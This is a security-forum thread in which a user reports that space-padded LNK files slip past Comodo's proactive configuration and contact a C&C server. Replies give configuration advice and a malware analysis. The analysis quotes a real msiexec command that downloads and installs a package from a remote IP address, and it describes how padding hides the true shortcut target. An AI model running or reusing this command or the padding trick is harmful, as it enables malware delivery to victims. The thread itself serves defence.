LNK Files Bypass All Protections in Comodo(default proactive config)

Hi,

I have some sample LNK files, but CIS doesn’t automatically contain them, and HIPS isn’t effective either. In the Windows properties target, it appears to be just a .cmd command, but there are actually numerous spaces added to exceed the display limit, making it look deceptive.
QQ20240925-215822
QQ20240925-215759

In the hex viewer, you can see the correct instructions. The spaces look like this:


And the real command is:
QQ20240925-215946

I’m using the proactive configuration in CIS. After executing the sample, it successfully connected to the C&C server without any alerts—there were no containment, HIPS, or firewall alerts.

Is there a way for CIS to prevent this type of attack?

3 Likes

You need to enable embedded code detection for cmd.exe

4 Likes

Check if these settings for cmd code are enabled.

Yes, it’s enabled. I am using the default proactive config

1 Like

Hello, the way is to wait for our friend @DecimaTech he can show you how and what to do with the tip he told you with a print and step by step. :smiley:

It is not enabled by default you must manually turn it on. There is a second switch that needs to be toggled on that is in the next column as shown in New_Style_xd screenshot.

Edit: Can you paste the full lnk command in your post, as I think I might know the problem thanks.

1 Like

May I dm you the samples?

1 Like

Hi,
I still got the same result

1 Like

Well you should also check the active process task and set it to show contained only, as it might actually be in containment. Also check the file list changes log to see what was added as trusted, because it might be incorrectly rated as trusted. Finally you can try adding *\winrm.cmd to the script analysis section and enabling embedded code detection for all of the default listed applications.

Otherwise it is most likely a bug with embedded code detection logic, I know I reported it not working for msiexec.exe.

3 Likes

Just looking at things quickly, this guy seems to be a variant of Rasberry Robin in that it uses the command “msiexec /q /i hxxp://154.201.83.175:3989/@ /qn” to connect to a server. There are a number of these that differ in the embedded code, but I guess this particular file is:
0265e8680fd984e4d89b839a06b18498b5d81916fc672006b0a2c401faa162ad. This isn’t malicious in itself (no more that dashost.exe would be) but instead would be if it successfully connected out to a server to download a malicious package (which it does not do).

A variant for which the Powershell command does work is (for the connection request only): 68d22f5b74f63fa13c4723b43545ceef4f588e96d5c3009c08cbe13aea2196ad

The above want to connect out to download a package which would drop in C:\Tiles: this is the files APerfectDay, the executable of which is signed (although one certificate is outdated) by Tencent and is found to be benign; however also in the package is a dll which is not:

The above example is this (A MSI file that will drop the package and create a startup entry):

9e4ac247acbb7da95936a20d962ce45fb18b752d4ec31c7aab1de45e5792b8ef

As Comodo will no allow the msi to run successfully, one must execute the msi in a VM with Containment off (not really suggesting this, by the way). Note that the installer is in Chinese and there is a few minute timeout).

Note that although all of these desire to be stealers, none achieves such a lofty goal.

m

5 Likes

Hey cruelsister, could you check my private message?

I guess its a bug :frowning:

1 Like